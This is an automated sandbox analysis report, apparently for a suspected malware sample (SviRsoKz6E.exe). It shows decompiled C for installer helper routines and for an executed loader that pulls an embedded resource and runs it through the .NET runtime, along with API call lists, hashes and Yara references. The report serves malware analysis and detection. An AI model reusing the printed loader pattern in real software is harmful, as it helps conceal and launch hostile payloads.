                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A5F
                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004032FF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403524,?,00000007,00000009,0000000B), ref: 00405A68
                  • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A79
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A59
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 2659869361-3916508600
                  • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                  • Instruction ID: 4e9c794251620aa29aecb4049673505928abe3d31fb5bce1aa7abaa38b2a0d50
                  • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                  • Instruction Fuzzy Hash: 2DD0A7A22015347AD20166254C06DDB690C8F02310B050066F200B2191C63C4C1147FD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405AF2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405AF2(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405A84(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}









                  0x00405afb
                  0x00405b02
                  0x00405b05
                  0x00405b07
                  0x00405b0b
                  0x00405b20
                  0x00405b3f
                  0x00000000
                  0x00405b27
                  0x00405b29
                  0x00405b2a
                  0x00405b2d
                  0x00405b2e
                  0x00405b36
                  0x00000000
                  0x00000000
                  0x00405b38
                  0x00405b3b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405b3b
                  0x00000000
                  0x00405b2a
                  0x00405b18
                  0x00000000
                  0x00405b19

                  APIs
                  • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,?,00405B5E,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,C:\Users\user\AppData\Local\Temp\nst2F82.tmp,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004058A9,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B00
                  • CharNextA.USER32(00000000), ref: 00405B05
                  • CharNextA.USER32(00000000), ref: 00405B19
                  Strings
                  • C:\Users\user\AppData\Local\Temp\nst2F82.tmp, xrefs: 00405AF3
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharNext
                  • String ID: C:\Users\user\AppData\Local\Temp\nst2F82.tmp
                  • API String ID: 3213498283-3170916568
                  • Opcode ID: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                  • Instruction ID: 371d989ad5315216d0c0cc34824f97af3956e00fc8829d3fd4d1a8d6fd0debac
                  • Opcode Fuzzy Hash: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
                  • Instruction Fuzzy Hash: 84F06251E14F956FFB3292680C44B777AA8CB95751F14407BD680762C286BC78408FAA
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x41f8e0 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x424730) {
							_t3 = CreateDialogParamA( *0x424720, 0x6f, 0, E00402DBA, 0);
							 *0x41f8e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406506(0);
					}
				} else {
					_t6 =  *0x41f8e0;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x41f8e0 = 0;
					return _t6;
				}
			}






                  0x00402e44
                  0x00402e64
                  0x00402e6e
                  0x00402e7a
                  0x00402e8b
                  0x00402e94
                  0x00000000
                  0x00402e99
                  0x00402ea0
                  0x00402e66
                  0x00402e6d
                  0x00402e6d
                  0x00402e46
                  0x00402e46
                  0x00402e4d
                  0x00402e50
                  0x00402e50
                  0x00402e56
                  0x00402e5d
                  0x00402e5d

                  APIs
                  • DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
                  • GetTickCount.KERNEL32 ref: 00402E6E
                  • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                  • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                  • String ID:
                  • API String ID: 2102729457-0
                  • Opcode ID: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                  • Instruction ID: 90c5076a8d782885986fbf54e6784afd95d1d531b418d8ad00c0f3389847d2fc
                  • Opcode Fuzzy Hash: d2a126c8e87298d62dcb77b716532c519560652f5a9048845524fe30780812a8
                  • Instruction Fuzzy Hash: E1F05E30A41620EBC621BB60FE0CA8B7BA4FB84B81705493AF049B11E8C77448878BDC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040515C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 89%
                  			E0040515C(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x420d14 != _t16) {
							_push(_t16);
							_push(6);
							 *0x420d14 = _t16;
							E00404B18();
						}
						L11:
						return CallWindowProcA( *0x420d1c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404A98(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404191(0x413);
				return 0;
			}





                  0x00405160
                  0x0040516a
                  0x00405186
                  0x004051a8
                  0x004051ab
                  0x004051b1
                  0x004051bb
                  0x004051bc
                  0x004051be
                  0x004051c4
                  0x004051c4
                  0x004051ce
                  0x00000000
                  0x004051dc
                  0x00405193
                  0x004051cb
                  0x004051cb
                  0x00000000
                  0x004051cb
                  0x0040519f
                  0x004051a1
                  0x00000000
                  0x004051a1
                  0x00405170
                  0x00000000
                  0x00000000
                  0x00405177
                  0x00000000

                  APIs
                  • IsWindowVisible.USER32(?), ref: 0040518B
                  • CallWindowProcA.USER32 ref: 004051DC
                    • Part of subcall function 00404191: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041A3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                  • Instruction ID: 1a2e93e4b5b60595961c78cfe9b1f953e315c10ea79d8335bfdfcc16afa4850a
                  • Opcode Fuzzy Hash: 4e0d83b517ec3755641dbbc7163631964c054c7a669fd012e4d2f406caf64491
                  • Instruction Fuzzy Hash: 8B015E31A10709ABEB215F51DD85B5B3A7AEB84314F600537F6007A1D1C73A9C929A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405FA8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E00405FA8(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F47(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                  0x00405fb6
                  0x00405fb8
                  0x00405fd0
                  0x00405fd5
                  0x00405fda
                  0x00406017
                  0x00406017
                  0x00405fdc
                  0x00405fee
                  0x00405ff9
                  0x00405fff
                  0x00406009
                  0x00000000
                  0x00000000
                  0x00406009
                  0x0040601c

                  APIs
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Mfkeoxlzmclr,00420508,?,?,?,00000002,Mfkeoxlzmclr,?,0040625D,80000002), ref: 00405FEE
                  • RegCloseKey.ADVAPI32(?,?,0040625D,80000002,Software\Microsoft\Windows\CurrentVersion,Mfkeoxlzmclr,Mfkeoxlzmclr,Mfkeoxlzmclr,?,00420508), ref: 00405FF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID: Mfkeoxlzmclr
                  • API String ID: 3356406503-3154993774
                  • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                  • Instruction ID: bc2ee3056b47e5ed157b0296f64e65c5d928d18fe46a96bfb4a95e0d5f896fcd
                  • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                  • Instruction Fuzzy Hash: C7015A72540209AADF22CF61CC09FDB3BA8EF95364F01403AF955A6190D778D964DFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405760, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405760(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422530->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x422530,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                  0x00405769
                  0x00405789
                  0x00405791
                  0x00405796
                  0x00000000
                  0x0040579c
                  0x004057a0

                  APIs
                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422530,Error launching installer), ref: 00405789
                  • CloseHandle.KERNEL32(?), ref: 00405796
                  Strings
                  • Error launching installer, xrefs: 00405773
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: Error launching installer
                  • API String ID: 3712363035-66219284
                  • Opcode ID: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                  • Instruction ID: 07a2ea870b6c965c9c8bd0de01314bb8301d1462abb1d5e573899e5cf6f1fbe8
                  • Opcode Fuzzy Hash: c3c80266f92bd9d667c92bf3182b136ee7f32a01548fe2ad44771ad24a16863f
                  • Instruction Fuzzy Hash: EEE04FB0A00309BFEB009B60ED45F7B77ACEB04204F408421BD44F2150E77498148A78
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040383F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040383F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41fcec;
				_t3 = E00403824(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41fcec =  *0x41fcec & 0x00000000;
				return _t3;
			}







                  0x00403840
                  0x00403848
                  0x0040384f
                  0x00403852
                  0x00403852
                  0x00403854
                  0x00403859
                  0x00403860
                  0x00403866
                  0x0040386a
                  0x0040386b
                  0x00403873

                  APIs
                  • FreeLibrary.KERNEL32(?,74B5FA90,00000000,C:\Users\user\AppData\Local\Temp\,00403817,00403631,?,?,00000007,00000009,0000000B), ref: 00403859
                  • GlobalFree.KERNEL32 ref: 00403860
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040383F
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: Free$GlobalLibrary
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 1100898210-3916508600
                  • Opcode ID: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                  • Instruction ID: 8a9dc77c7c1ee1b135259636166a50b6bf5175fc084ac984c046f8d06e3dc5f9
                  • Opcode Fuzzy Hash: d577bf8b0ad620a88e67a325e5e326df37630095cafad59fd52e64b4463e9122
                  • Instruction Fuzzy Hash: 1BE0EC3350152057C661AF5AAA0475ABAEC7F48B22F05847AF884BB2618B745C429BDC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405AA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405AA0(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                  0x00405aa1
                  0x00405aab
                  0x00405aad
                  0x00405ab4
                  0x00405abc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405abc
                  0x00405abe
                  0x00405ac3

                  APIs
                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SviRsoKz6E.exe,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00405AA6
                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SviRsoKz6E.exe,C:\Users\user\Desktop\SviRsoKz6E.exe,80000000,00000003), ref: 00405AB4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: CharPrevlstrlen
                  • String ID: C:\Users\user\Desktop
                  • API String ID: 2709904686-1669384263
                  • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                  • Instruction ID: b7fadc1cb965da237d7d6f6ff84102907be402caa55b699d9cfbdae9487d107c
                  • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                  • Instruction Fuzzy Hash: 98D0A9B25099B06EF303A2108C01B8F6A88CF13300F0A00A2E580E21A1C37C4C428BFD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405BBF, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405BBF(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                  0x00405bcf
                  0x00405bd1
                  0x00405bd4
                  0x00405c00
                  0x00405bd9
                  0x00405be2
                  0x00405be7
                  0x00405bf2
                  0x00405bf5
                  0x00405c11
                  0x00405bf7
                  0x00405bfe
                  0x00000000
                  0x00405bfe
                  0x00405c0a
                  0x00405c0e
                  0x00405c0e
                  0x00405c08
                  0x00000000

                  APIs
                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCF
                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE7
                  • CharNextA.USER32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BF8
                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E1A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C01
                  Memory Dump Source
                  • Source File: 00000000.00000002.199780510.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.199774427.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID: lstrlen$CharNextlstrcmpi
                  • String ID:
                  • API String ID: 190613189-0
                  • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                  • Instruction ID: 9eba209a39fe6667a971e8652d35f93e0e0dd93f5ee50219908c4175a565a31b
                  • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                  • Instruction Fuzzy Hash: C7F0F631204914FFDB02DFA4DD40D9FBBA8EF56350B2540B9E840F7211D634EE01ABA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: SviRsoKz6E.exe PID: 632 Parent PID: 2212 SviRsoKz6E.exeCOMMON

                  Executed Functions

                  Function 00401489, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 43COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                  0x0040149f
                  0x004014a5
                  0x004014a9
                  0x004014ec
                  0x004014ee
                  0x004014ee
                  0x004014b7
                  0x004014bb
                  0x004014c7
                  0x004014cd
                  0x004014d3
                  0x004014d8
                  0x004014e0
                  0x004014e0
                  0x004014d8
                  0x004014e6
                  0x00000000

                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                  • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                  • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                  • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                  • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                    • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                  • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                  • ExitProcess.KERNEL32 ref: 004014EE
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                  • String ID: PPXs$v4.0.30319
                  • API String ID: 2372384083-271932656
                  • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                  • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                  • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                  • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 051DF5F8, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.466410305.00000000051D0000.00000040.00000001.sdmp, Offset: 051D0000, based on PE: false
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 717b753eb9d2aecc3f2d767f55778d3a4c1759cb26e0c42a6ea865ec9c5781c8
                  • Instruction ID: 7b2489860242533141414729889e076e1a3f4aec73e0440809ade436c6cb4229
                  • Opcode Fuzzy Hash: 717b753eb9d2aecc3f2d767f55778d3a4c1759cb26e0c42a6ea865ec9c5781c8
                  • Instruction Fuzzy Hash: 0BF15D31A00209DFDB14DFA9C888BADF7F2FF88304F158559E416AF295DB74AA46CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                  0x00401e22
                  0x00401e28

                  APIs
                  • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                  Memory Dump Source
                  • Source File: 00000002.00000002.459577759.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Yara matches
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                  • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                  • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                  • Instruction Fuzzy Hash:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0232B6C0, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32 ref: 0232B730
                  • GetCurrentThread.KERNEL32 ref: 0232B76D
                  • GetCurrentProcess.KERNEL32 ref: 0232B7AA
